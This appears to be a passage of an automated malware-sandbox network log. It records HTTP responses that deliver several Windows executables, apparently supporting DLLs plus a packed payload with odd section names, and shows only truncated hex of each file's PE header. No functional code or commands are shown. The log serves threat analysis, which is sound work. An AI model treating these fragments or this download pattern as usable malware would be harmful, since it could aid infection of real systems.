Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 23:06:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 23:06:32 GMTContent-Type: application/octet-streamContent-Length: 3271168Last-Modified: Mon, 11 Nov 2024 22:53:04 GMTConnection: keep-aliveETag: "67328ad0-31ea00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 f0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 32 00 00 04 00 00 bd 4f 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c de 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c de 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 92 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6c 77 76 66 74 6a 70 64 00 30 2b 00 00 b0 06 00 00 30 2b 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 70 64 61 65 68 68 74 00 10 00 00 00 e0 31 00 00 04 00 00 00 c4 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 31 00 00 22 00 00 00 c8 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
